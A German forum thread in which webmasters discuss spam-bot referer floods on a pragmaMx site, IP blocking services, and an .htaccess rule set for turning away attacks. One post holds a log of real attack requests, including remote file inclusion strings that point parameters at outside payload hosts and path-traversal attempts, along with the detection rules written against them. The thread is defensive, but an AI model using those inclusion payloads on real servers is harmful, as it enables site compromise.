Suche

[grafikmurkser]

Hallo,
kann mir jemand sagen was es mit diesem Referer auf sich hat ?
   http://fraktal-schmiede.de/register-me.html%2B%255BPLM=0%255D%255BR%255D%2BGET%2Bhttp:/fraktal-schmi..
der taucht seit einigen Tagen immer wieder auf..


Hat sich nach dem Auslesen der Logifiles und bissel googlen erledigt.
Das ist offenbar ein, nicht unbekannter, Spambot der versucht reinzukommen.

[grafikmurkser]

langsam macht es sich bemerkbar das pragma keinen "vorgeschalten " schutz hat  .. wie es bei anderen systemen ( und selbst für smf) angeboten wird innerhalb von  10 minuten :
12 mal : http://fraktal-schmiede.de/register-me.html%2B%255BPLM=0%255D%255BR%255D%2BGET%2Bhttp:/fraktal-schmi
10 mal : http://fraktal-schmiede.de/register-me.html%2B%255BPLM=0%255D%255BR%255D%2BGET%2Bhttp:/home.html
10 mal: http://fraktal-schmiede.de/register-me.html%2B%255BPLM=0%255D%255BR%255D%2BGET%2Bhttp:/Sections-artid-6.html

das sind eindeutig Angriffe von Bots. Mir wurde angeraten die Seite vom Netz zunehmen da unklar ist ob das cms aussreichend geschützt ist.

[Andi]

langsam macht es sich bemerkbar das pragma keinen "vorgeschalten " schutz hat  .. wie es bei anderen systemen ( und selbst für smf) angeboten wird

Und was bewirken die?
Dass man die Seiten nicht mehr über unsinnige URL's aufrufen kann?
Hast mal ein Beispiel?

das sind eindeutig Angriffe von Bots.

Wer sagt das? Und was sollen die Angriffe bewirken?

Mir wurde angeraten die Seite vom Netz zunehmen da unklar ist ob das cms aussreichend geschützt ist.

Der Berater ist gut. Kann der auch weitere Informationen geben, wo er in den referern eine Gefahr sieht?
Ausser dass der Webmaster darauf klickt und seine Seite fehlerhaft angezeigt wird...


In den Logfiles sollte sich die IP der "angreifenden" Bots ermitteln lassen.

[GerhardSt]

Hallo grafikmurkser

solche Aufrufe habe ich auch ab und zu, nur die geben meist relativ schnell wieder auf, wenn sie merken das sie damit nicht weiter kommen

Gerhard

[grafikmurkser]

ab und zu ist gut  .. ich hab seid vorgestern  über 5000 ( fünftausend ) solcher zugriffe
unteranderem weil das "sperren" der IP - im adminbereich dafür völlig unzureichend ist ... zumal sich die IPs erst am nächsten tag über die logifiles auslesen lassen  - in der tabelle visitors tauchen die garnicht auf

Der Berater ist gut. Kann der auch weitere Informationen geben, wo er in den referern eine Gefahr sieht?
Ausser dass der Webmaster darauf klickt und seine Seite fehlerhaft angezeigt wird...

es sind IP`s die für DoS-Attacken berühmt sind
Und Andi  - zu der frage was "vorgeschalteter" schutz macht .. tjo was zB macht NukeSentinel ? .....
zB bots abwehren .
eine ähnliche wirkung dürfte dieses tool haben :
http://custom.simplemachines.org/mods/index.php?mod=1599 bei botscout sind bereits einige der IP`s die bei mir auftauchten "bekannt" .. zB
http://botscout.com/search.htm?sterm=93.190.142.78&stype=q

[GerhardSt]

Und was hälst du von Bot-Trap

[grafikmurkser]

Bot-Trap hat die eigenschaft  nicht bei all-inkl. zu funktionieren  -

[GerhardSt]

Bist du dir sicher das, das noch aktuell ist?
Kenne leider die genaue Ursache nicht.
Aber ich habe dazu gerade mal diesen Post im Bot-Trap-Forum gefunden, und die Domain getestet: Ergebniss Domain ist geschützt und ist auch bei all-inkl.

[Oscar175]

Du zählst wohl meine IP auch zu den Bots, denn mich hast du auch gesperrt 
Wollte gerade deine geposteten Links testen, was da genau passiert.
LG

[grafikmurkser]

hmmmmm inzwischen ist ( durch eine kleine änderung am script) bot-trap lauffähig  .. währe gut zu wissen ob du jetzt durch meine ip-sperrung oder durch bot-trap ausgesperrt wurdest .

[Oscar175]

Ich glaube von dir, durch die IP Sperre im Admin Bereich. Erhalte folgende Meldung:

Apophysis - Schmiede
Du wurdest vom AdminTeam kurzfristig gesperrt!
Wenn Du Genaueres wissen möchtest, setze Dich bitte, mit dem Team in Verbindung.
info [at] fraktal-schmiede . de

LG

[grafikmurkser]

Hallo, müsste jetzt aber gehen  .....

[Andi]

weil das "sperren" der IP - im adminbereich dafür völlig unzureichend ist

Stimmt, so wie fast alle ip-perren in der heutigen Zeit recht unsinnig sind.

umal sich die IPs erst am nächsten tag über die logifiles auslesen lassen

Provider fragen, bei uns geht das....

es sind IP`s die für DoS-Attacken berühmt sind

Was ist berühmt... Ich kenn die nicht. Und das was da bei dir aufläuft ist sicher keine dos attacke.

tjo was zB macht NukeSentinel ? zB bots abwehren .

Jop, und tausende "unschuldige" Besucher gleich mit. Mit meinen IP's von 1+1 kann ich auf fast keine Nuke Seite mehr zugreifen.
Ansonsten war Sentinel zumindest früher nur ein Schutz für nuke, weil der ehemalige Coder es nicht selbst hingebracht hat, sein CMS abzusichern....


Wie oben schon angedeutet halte ich nicht mehr viel von irgendwelchen ip-Sperrungen. Mit ein Grund warum wir hier auch kein Bot-Trap mehr einsetzen. Es wurden viele Besucher aus dem Ausland unnötig geblockt.
Das lässt sich mit solchen Schutzmechanismen nicht ausschliessen. Wer damit leben kann, dem sei bot-Trap empfohlen.

Im Internet gibt es massenweise Seiten, die versuchen automatisch Sicherheitslücken von bestimmten Scripten auszunutzen. So werden dann auf pragmaMx alle möglichen joomla, nuke und Coppermine Attacken losgeschossen, die sich aber NULL auswirken.
Ausser dass sich die logfiles füllen und evtl. die referer vollgemüllt werden, passiert da garnix.

Wichtig ist nicht der Aufruf der Seite, sondern was mit den übergebenen Parametern passiert.
pragmaMx setzt auf innere Sicherheit, nicht auf das drumrum.


edit:
geil, jetzt habe ich etwas rumgeklickt und bin auch gesperrt. 92.194.121.37 bin ich, kein bot....
Wird jetzt jeder, der die Links hier im thread anklickt gesperrt...

[grafikmurkser]

nein Andi, ich kenn mich der Empfehlung für Bot-Trap NICHT anschliessen ...
Ich hab mir die Mühe gemacht und jetzt  im Minutentakt die Referer im Adminbereich angeschaut. 10 Minuten lang. Innerhalb nur einer Minute gab es 6 Einträge wie oben beschrieben. Alle von einer IP . Diese IP intressiert Bot-Trap garnicht denn :

Die IP 92.194.121.37 befindet sich auf der Whitelist und kann nicht gesperrt werden.

Ansonsten .. Dein Wort  in Gottes Ohr ...

[Andi]

.....
edit:
geil, jetzt habe ich etwas rumgeklickt und bin auch gesperrt. 92.194.121.37 bin ich, kein bot....
Wird jetzt jeder, der die Links hier im thread anklickt gesperrt...

Vermutlich wirst du diese Einträge jetzt nie wieder los, weil die links schon im Google-Cache und weiss Gott wo gelistet sind....

[Oscar175]

Okay, bei mir funktioniert es wieder.
Vielleicht beruhigt es sich bei dir wieder, wenn die Bots merken, dass sie nicht weit kommen (falls die so schlau sind)

LG

[Andi]

Mal was anderes....

Wenn meine IP auch mit einem Referer von deiner Seite auftaucht, dann spinnt doch da was.
Hast du irgendwelche Umleitungen in der .htaccess, oder sonstwo definiert?
Oder spinnt da evtl. der Webseitenübersetzer, der produziert ja auch so komische URL's die evtl. auch in den referern auftauchen...

[GerhardSt]

Was mir jetzt erst aufgefallen ist, warum wird bei dir in einer URL deine Seite 2x aufgerufen?
Wenn das ein Bot ist, will der normalerweise etwas von einer anderen Seite laden, ist zumindest bei mir so.

http://fraktal-schmiede.de/register-me.html%2B%255BPLM=0%255D%255BR%255D%2BGET%2Bhttp:/fraktal-schmi

Kann es sein das du da irgendetwas umgecodet hast, was diesen Fehler verursacht?

[grafikmurkser]

Andi ich versteh nicht ganz was Du meinst. Und nein ich hab keine Umleitungen in der htacess...ausser mod-rewrite
und was meinst du mit websitenübersetzer ? die online-transaltionservices von google und babelfish ? die sind eindeutig zuerkennen.

[grafikmurkser]

Was mir jetzt erst aufgefallen ist, warum wird bei dir in einer URL deine Seite 2x aufgerufen?
Wenn das ein Bot ist, will der normalerweise etwas von einer anderen Seite laden, ist zumindest bei mir so.

http://fraktal-schmiede.de/register-me.html%2B%255BPLM=0%255D%255BR%255D%2BGET%2Bhttp:/fraktal-schmi

Kann es sein das du da irgendetwas umgecodet hast, was diesen Fehler verursacht?

nein und es sind Bots.... einige  der IP`s sind zB bei BotScout eingetragen . Witzigerweise auch IPs die bei Bot-Trap in der weissen liste stehen  *g

kleine Ergänzung ..  wohin die "zweite" domain geht kann man hier  schlecht sehen  .. Meist auf eine Seite auf der man posten kann ( Contents, Galerie... usw )
oder ganz woanders hin
hier mal einige vollständige:

/register-me.html%2B%255BPLM=0%255D%255BR%255D%2BGET%2Bhttp:/favicon.ico  ( sehr witzig *g)
/register-me.html%2B%255BPLM=0%255D%255BR%255D%2BGET%2Bhttp:/images/forum/avatar/blank.gif (auch nicht schlecht)
/register-me.html%2B%255BPLM=0%255D%255BR%255D%2BGET%2Bhttp:/fraktal-schmi/themes/mx-darkbreak/style/style.css
/register-me.html%2B%255BPLM=0%255D%255BR%255D%2BGET%2Bhttp:/home.html

[Andi]

nein und es sind Bots.... einige  der IP`s sind zB bei BotScout eingetragen . Witzigerweise auch IPs die bei Bot-Trap in der weissen liste stehen  *g

Genauso wie meine IP (oder der ganze ip-range) irgendwann mal bei bot-trap als schädlich eingetragen war....

Was ist denn BotScout?
Vom Prinzip nichts anderes als bot-trap. Irgend einer macht mit einer IP was "böses". Das wird dort gemeldet und die ip gesperrt.
Mit dem Unterschied, dass bei bot-trap die Einträge anscheinend besser geprüft werden und deswegen meine ip wieder bereinigt wurde....
Nur weil bei BotScout eine IP eingetragen ist, heisst das noch lange nicht, dass das ein bot ist. Und nicht jeder bot ist schädlich. Jede Suchmaschine ist ein Bot.... Das ganze Thema wird m.M. durch Sch**sshausparolen völlig verquert und ins Absurde gezogen. Irgendwann ist das ganze Internet gesperrt....

und was meinst du mit websitenübersetzer

Jop, die meinte ich.

hier mal einige vollständige:

Die kannst du hier auch haben:
http://www.pragmamx.org/home.html%2B%255BPLM=0%255D%255BR%255D%2BGET%2Bhttp:/home.html
Schau dir dann mal die generierten Links, bzw. den Quelltext an...

Das liegt am Prinzip der mod_rewrite Umschreibung und ist kein Angriff.
Da braucht man die Seite nur einmal in der Art irgendwo verlinken und die Besucher klicken da rum

[GerhardSt]

Bot-Trap hat den Fehler schon eingesehen, und gibt deswegen die IP´s nach einer gewissen Zeit wieder frei, wenn diese nicht mehr vom Script zurückgemeldet werden
Das System ist zwar noch immer nicht ganz ausgereift, aber funktioniert meiner Meinung schon recht gut.

[grafikmurkser]

danke Andi für die Info 
stellt sich jetzt die Frage: was kann man da machen ?

[Andi]

stellt sich jetzt die Frage: was kann man da machen ?

In erster Linie ruhig Blut bewahren
Entweder ignorieren, oder wenn man mit eventuellen "Fehlsperrungen" leben kann, bot-trap einsetzen.


Ich hatte letztes Jahr mal versuchsweise auf der Demoseite etwas in die .htaccess eingebaut, was uns die ständigen dumm-nuke-hacks vom Leib halten soll, die uns hier im Sekundenabstand belästigen. Das ganze fragt einfach nur gefährlich anmutende url-Parameter ab und leitet wenn was erkannt wird auf eine dummy-Seite weiter, wo der Zugriff geloggt wird.
Habe da noch nicht weiter gemacht, aber die Zahlen sind schon recht interessant.

Seit 27.01.2008 01:00h wurden 1.181.013 Zugriffe geloggt.

Die letzten sehen so aus:

Code Auswählen Erweitern

log_time                remote_addr     query_string                                     agent
2009-04-05 20:32:37 95.208.45.184 id=http://mypregnancy.orgfree.com/index.html?   Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;...
2009-04-05 20:31:53 91.89.38.17 id=http://schoolpapers.hostinginfive.com/bike.htm?   Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;...
2009-04-05 20:31:11 78.43.195.201 id=http://mypregnancy.orgfree.com/index.html?   Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;...
2009-04-05 20:28:05 77.221.130.12 path=http://forgottentreasures.net/advguestbook/he...   libwww-perl/5.805
2009-04-05 20:28:05 77.221.130.12 path=http://forgottentreasures.net/advguestbook/he...   libwww-perl/5.805
2009-04-05 20:27:04 206.220.64.3 _REQUEST=&_REQUEST[option]=com_content&_REQUEST[It...   libwww-perl/5.805
2009-04-05 20:26:53 81.173.235.75 id=http://mypregnancy.orgfree.com/index.html?   Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;...
2009-04-05 20:26:30 77.221.130.18 poc_root_path=http://anggey.selfip.com/har/id.txt?...   libwww-perl/5.805
2009-04-05 20:25:56 78.43.195.201 id=http://mypregnancy.orgfree.com/index.html?   Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;...
2009-04-05 20:25:30 77.221.130.18 poc_root_path=../../../../../../../../../../../../...   libwww-perl/5.805
2009-04-05 20:24:53 77.221.130.18 poc_root_path=../../../../../../../../../../../../...   libwww-perl/5.805
2009-04-05 20:24:51 77.221.130.18 poc_root_path=http://anggey.selfip.com/har/id.txt?...   libwww-perl/5.805
2009-04-05 20:24:26 77.221.130.18 poc_root_path=../../../../../../../../../../../../...   libwww-perl/5.805
2009-04-05 20:24:18 77.221.130.18 poc_root_path=http://anggey.selfip.com/har/id.txt?...   libwww-perl/5.805
2009-04-05 20:23:45 78.43.195.201 id=http://mypregnancy.orgfree.com/index.html?   Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;...
2009-04-05 20:23:42 66.230.213.52 dir[inc]=http://www.laretouche.fr//administrator/b...   Mozilla/5.0
2009-04-05 20:23:41 78.43.163.4 id=http://mypregnancy.orgfree.com/index.html?   Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;...
Man sieht, da ist innerhalb weniger Minuten alles vertreten, von Hackern bis Spammer....

Wer die Umleitung in seiner .htaccess auch verwenden will:

Code Auswählen Erweitern

### goodboy ###################
# versch. Hacker abwehren
#                             path           | dir        | language           
RewriteCond %{QUERY_STRING} ([Pp][Aa][Tt][Hh]|[Dd][Ii][Rr]|[Gg][Uu][Aa][Gg][Ee]|root|open|mod|page|seite|file|error|action|style|\])=(ht|f)tps?:// [OR]
RewriteCond %{QUERY_STRING} ^([xlu]|lan|id)=(ht|f)tps?:// [OR]
RewriteCond %{QUERY_STRING} include.*[a-zA-Z]=(ht|f)tps?:// [OR]
RewriteCond %{QUERY_STRING} cd%20/[a-zA-Z0-9_.] [NC]
RewriteRule .* http://goodboy.pragmamx.eu/ [L,R=301]

RewriteCond %{HTTP_USER_AGENT}  ^libwww-perl.* [OR]
RewriteCond %{QUERY_STRING} lol\.txt [OR]
RewriteCond %{QUERY_STRING} turkmirc [OR]
RewriteCond %{QUERY_STRING} select.*nuke_(users|authors) [NC]
RewriteRule .* http://goodboy.pragmamx.eu/ [L,R=301]

#RewriteCond %{REQUEST_FILENAME} .*(forum|forums|phpbb|phpbb2|board)/.*
#RewriteRule .* http://goodboy.pragmamx.eu/ [L,R=301]
### goodboy end ###############


Auf http://goodboy.pragmamx.eu/ läuft nur das Logging und man bekommt nen 404er...
Anstatt dessen könnte man auch sonstwo hinleiten.

[grafikmurkser]

aha , dankeschön .. hmm wie sieht die dummy-seite aus ? hat sie spezielle schreibrechte ?? oder könnte ich die logs auch woanders hinschreiben lassen ? in eine log-datei ?

[Andi]

Das logging ist ein spezielles Script auf der Dummy-Seite. Das möchte ich so nicht veröffentlichen.

Man kann entweder, auch dorthin leiten, dann sammeln wir die Daten gemeinsam, oder man bastelt einfach ne eigene Fehlerseite, auf die geleitet wird. Oder man leitet zum Bundeskriminalamt um, oder sowas....

[grafikmurkser]

na dann nehm ich deine dummyseite .. und schmeiss den bottrap wieder raus, der hat schon ein bot gesperrt, den ich selbst "aktiviert " hab ( internetseer..)
danke für die hilfe 

edit: so , eingebaut...

[comedi]

@Andi,

man bastelt einfach ne eigene Fehlerseite,

Brauche ich dort kein zusätzliches Script zum sammeln?

[Andi]

Wenn man die Umleitung auf http://goodboy.pragmamx.eu/ belässt, werden die Angriffe dort mitgesammelt.

[reddragon]

Oder man leitet zum Bundeskriminalamt um, oder sowas....

Na dann freut sich der Bundes-Schäuble

[grafikmurkser]

Hallo und GuMo Andi, erstmal vielen Dank nochmal für den Code, von dem sicher einige pragma-User profitieren werden
Leider ist damit aber noch nicht geklärt woher die doppelte URL kommt ..
Bei bot-trap hat man sich darauf eingeschossen, das es am cms/ der htacess liegt. Hinweise darauf das es innerhalb von  48 Stunden zu über 5000 Zugriffen in der selben Art kam wurden schlicht ignoriert (meine Seite kommt normal nie zu solchen "Zugriffzahlen" - schon garnicht auf so wirre Url`s wie diese:

/register-me.html%2B%255BPLM=0%255D%255BR%255D%2BGET%2Bhttp:/favicon.ico 

die dann auch noch 200 mal aufgerufen werden.
Bei bot-trap erhielt ich zB diese Antwort:

das spielt doch keine Rolle ob man es auf deiner Seite erzeugen kann oder nicht.
tatsache ist das dein CMS zulässt das beliebige Zeichenketten angehängt werden
und genau das ist der Knackpunkt - du musst per Rules in der htaccess verhindern
das irgendwas nach .html angehängt werden kann!

Was müsste ich da für eine Regel schreiben damit dies nicht passiert. Wenn dies überhaupt so stimmt

[grafikmurkser]

@ Andi  ..  wegen meiner letzten PM .. es funktioniert ! Die laufen jetzt alle auf eine mx-Error-Seite

[grafikmurkser]

kann geschlossen werden. ich hab eine möglichkeit gefunden die spamreferer zu sperren. 
falls jetzt welche an b-t / page-restrictor denken - nein , damit geht es nicht.. da man dort riesen probleme hat die referer als spam einzustufen, man hatte dort gar erst die behauptung aufgestellt das das mod_rewrite des eingesetzten cms dafür verantwortlich ist .
später wurde allerdings  bestätigt das es sich um commandozeilen für spambots handelt , welche "durchgereicht" werden. sehr eigenartig das ganze. für mich ist das thema b-t jedenfalls erledigt